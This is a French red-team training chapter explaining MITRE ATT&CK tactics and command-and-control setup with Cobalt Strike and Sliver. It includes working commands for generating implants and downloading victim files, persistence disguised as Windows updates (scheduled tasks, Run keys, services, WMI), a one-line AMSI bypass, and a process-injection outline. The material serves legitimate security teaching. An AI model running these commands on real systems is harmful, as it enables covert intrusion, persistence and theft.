Le Red Team est une approche d’audit avancée qui simule des attaquants réels sur une durée prolongée. Contrairement au pentest classique, le Red Team teste les capacités de détection et de réponse de l’organisation. Ce chapitre couvre le framework MITRE ATT&CK et la mise en place d’une infrastructure de commandement et contrôle (C2).
Le framework MITRE ATT&CK
ATT&CK = Adversarial Tactics, Techniques & Common Knowledge
14 Tactiques (colonnes de la matrice) :
1. Reconnaissance → Collecte d'infos avant attaque
2. Resource Development → Préparation de l'infrastructure
3. Initial Access → Phishing, exploitation de services exposés
4. Execution → Exécution de code malveillant
5. Persistence → Maintien de l'accès
6. Privilege Escalation → Obtenir des droits plus élevés
7. Defense Evasion → Contourner antivirus, SIEM
8. Credential Access → Vol de credentials
9. Discovery → Énumération de l'environnement
10. Lateral Movement → Pivot vers d'autres systèmes
11. Collection → Récupération de données
12. C2 → Communication avec l'infrastructure
13. Exfiltration → Extraction des données
14. Impact → Destruction, chiffrement, disruption
Cobalt Strike : le C2 de référence
Composants :
Team Server → Serveur central (généralement sur VPS)
Client → Interface graphique pour les opérateurs
Beacon → Implant déployé sur les cibles (check-in périodique)
Profils Malleable C2 :
Permettent de faire passer Beacon pour du trafic légitime
(Amazon S3, Microsoft Teams, Slack...)
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
http-get {
set uri "/api/v1/health"
client { header "Accept" "application/json"; }
}
Alternatives open source : Sliver et Havoc
# Sliver C2 (BishopFox)
# Serveur
sliver-server
# Générer un implant
sliver > generate --mtls --os windows --arch amd64 --save /tmp/implant.exe
# Écouter les connexions
sliver > mtls --lport 8888
# Commandes post-exploitation dans une session
sliver (IMPLANT) > whoami
sliver (IMPLANT) > ps
sliver (IMPLANT) > download C:\Users\victim\Documents\secret.docx
Persistence : techniques ATT&CK T1053
# Tâche planifiée (T1053.005)
schtasks /create /tn "WindowsUpdate" /tr "C:\ProgramData\beacon.exe" /sc onlogon /ru SYSTEM
# Clé Run registre (T1547.001)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\ProgramData\beacon.exe"
# Service Windows (T1543.003)
sc create "WindowsHelper" binpath= "C:\ProgramData\beacon.exe" start= auto
sc start WindowsHelper
# WMI Event Subscription (T1546.003) — persistance très furtive
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter ...
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer ...
Defense Evasion : contourner les défenses
# AMSI Bypass (désactiver l'analyse PowerShell en mémoire)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Process Injection : injecter un beacon dans un processus légitime (notepad.exe)
# T1055 - Process Injection
$proc = Start-Process notepad.exe -PassThru
# → Injecter le shellcode dans notepad.exe via VirtualAllocEx + WriteProcessMemory
# Obfuscation PowerShell
Invoke-Obfuscation # Tool : github.com/danielbohannon/Invoke-Obfuscation
- ATT&CK structure les TTPs des attaquants en 14 tactiques et centaines de techniques
- Un C2 (Cobalt Strike, Sliver) centralise le contrôle des implants déployés
- Les profils Malleable C2 camouflent le trafic C2 dans du trafic légitime
- La persistence et l’évasion sont aussi importantes que l’exploitation initiale
📚 Formation : Cybersécurité avancée : exploitation et red team

-
Add a note